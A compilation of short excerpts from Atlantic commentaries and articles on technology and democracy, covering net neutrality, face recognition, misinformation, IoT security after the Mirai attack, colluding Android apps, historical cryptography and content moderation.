Atlantic, The

The Antidote to Authoritarianism

[Commentary] The open internet has decentralized the media and allowed black activists in a modern movement against police and state violence to bypass discriminatory media gatekeepers and reveal the extent of the state’s abuse. When ordinary people capture shocking video footage of police officers fatally shooting black citizens, for example, it is more difficult for Americans to ignore the realities of racial injustice.

Technology has always been a double-edged sword for black people in America and beyond. On the one hand, it can pose a grave threat; on the other, great opportunity. Our survival, and our democracy, requires us to reject high-tech policing and usher in the strongest net neutrality rules available. The open internet can represent the future of digital democracy, or we can use technology to continue encoding inequality into our modern world.

[Malkia Cyril is the founder and executive director of the Center for Media Justice.]

You Cannot Encrypt Your Face

[Commentary] From the Boston Tea Party to the printing of Common Sense, the ability to dissent—and to do it anonymously—was central to the founding of the United States. Anonymity was no luxury: It was a crime to advocate separation from the British Crown. It was a crime to dump British tea into Boston harbor. This trend persists. Our history is replete with moments when it was a “crime” to do the right thing, and legal to inflict injustice.

The latest crime-fighting tools, however, may eliminate people’s ability to be anonymous. Historically, surveillance technology has tracked our technology: our cars, our computers, our phones. Face recognition technology tracks our bodies. And unlike fingerprinting or DNA analysis, face recognition is designed to identify us from far away and in secret.

[Alvaro Bedoya is the founding executive director of the Center on Privacy & Technology at Georgetown Law. ]

The Age of Misinformation

[Commentary] There are two big problems with America’s news and information landscape: concentration of media, and new ways for the powerful to game it.

First, we increasingly turn to only a few aggregators like Facebook and Twitter to find out what’s going on the world, which makes their decisions about what to show us impossibly fraught. Those aggregators draw—opaquely while consistently—from largely undifferentiated sources to figure out what to show us. They are, they often remind regulators, only aggregators rather than content originators or editors.

Second, the opacity by which these platforms offer us news and set our information agendas means that we don’t have cues about whether what we see is representative of sentiment at large, or for that matter of anything, including expert consensus. But expert outsiders can still game the system to ensure disproportionate attention to the propaganda they want to inject into public discourse. Those users might employ bots, capable of numbers that swamp actual people, and of persistence that ensures their voices are heard above all others while still appearing to be humbly part of the real crowd. What to do about it? We must realize that the market for vital information is not merely a market.

[Jonathan Zittrain is a professor at Harvard Law School and the Kennedy School of Government.]

Technology is Changing Democracy As We Know It

We asked more than two dozen people who think deeply about the intersection of technology and civics to reflect on two straightforward questions: Is technology hurting democracy? And can technology help save democracy? We’ll publish a new essay every day for the next several weeks, beginning with Shannon Vallor’s “Lessons From Isaac Asimov’s Multivac.”

The Internet of Things Needs a Code of Ethics

An interview with Francine Berman, a computer-science professor at Rensselaer Polytechnic Institute and a longtime expert on computer infrastructure.

In October, when malware called Mirai took over poorly secured webcams and DVRs, and used them to disrupt internet access across the United States, I wondered who was responsible. Not who actually coded the malware, or who unleashed it on an essential piece of the internet’s infrastructure—instead, I wanted to know if anybody could be held legally responsible. Could the unsecure devices’ manufacturers be liable for the damage their products? Right now, in this early stage of connected devices’ slow invasion into our daily lives, there’s no clear answer to that question. That’s because there’s no real legal framework that would hold manufacturers responsible for critical failures that harm others. As is often the case, the technology has developed far faster than policies and regulations.

The Problem With WikiTribune

[Commentary] The larger problem with WikiTribune is this: Someone who is paid for doing journalistic work cannot be considered “equals” with someone who is unpaid. And promoting the idea that core journalistic work should be done for free, by volunteers, is harmful to professional journalism.

The difference between a professional and a hobbyist isn't always measurable in skill level, but it is quantifiable in time and other resources necessary to complete a job. This is especially true in journalism, where figuring out the answer to a question often requires stitching together several pieces of information from different sources—not just information sources but people who are willing to be questioned to clarify complicated ideas.

When Apps Secretly Team Up to Steal Your Data

Pairs of Android apps installed on the same smartphone have ways of colluding to extract information about the phone’s user, which can be difficult to detect. Security researchers don’t have much trouble figuring out if a single app is gathering sensitive data and secretly sending it off to a server somewhere. But when two apps team up, neither may show definitive signs of thievery alone. And because of an enormous number of possible app combinations, testing for app collusions is a herculean task. A study released recently developed a new way to tackle this problem—and found more than 20,000 app pairings that leak data.

The Founding Fathers Encrypted Secret Messages, Too

As a youth in the Virginia colony, Thomas Jefferson encrypted letters to a confidante about the woman he loved. While serving as the third president of the newly formed United States, he tried to institute an impossibly difficult cipher for communications about the Louisiana Purchase. He even designed an intricate mechanical system for coding text that was more than a century ahead of its time.

Cryptography was no parlor game for the idle classes, but a serious business for revolutionary-era statesmen who, like today’s politicians and spies, needed to conduct their business using secure messaging. Codes and ciphers involving rearranged letters, number substitutions, and other now-quaint methods were the WhatsApp, Signal, and PGP keys of the era.

What Happens When the President Is a Publisher, Too?

What everyone actually knows, or should by now, is that while President Donald Trump claims to hate “the media,” he is himself an active publisher. And when the Trump Administration talks about the press as “the opposition,” that may be because President Trump is himself competing with traditional outlets in the same media environment, using the same publishing tools. It’s no wonder there was so much speculation about President Trump possibly launching his own TV network to rival Fox. It’s also no wonder that President Trump recently suggested he owes his presidency to Twitter, which he has used to blast critics and spout conspiracy theories since at least 2011.

Social Media’s Silent Filter

Thus far, much of the post-election discussion of social-media companies has focused on algorithms and automated mechanisms that are often assumed to undergird most content-dissemination processes online. But algorithms are not the whole story. In fact, there is a profound human aspect to this work. I call it commercial content moderation, or CCM.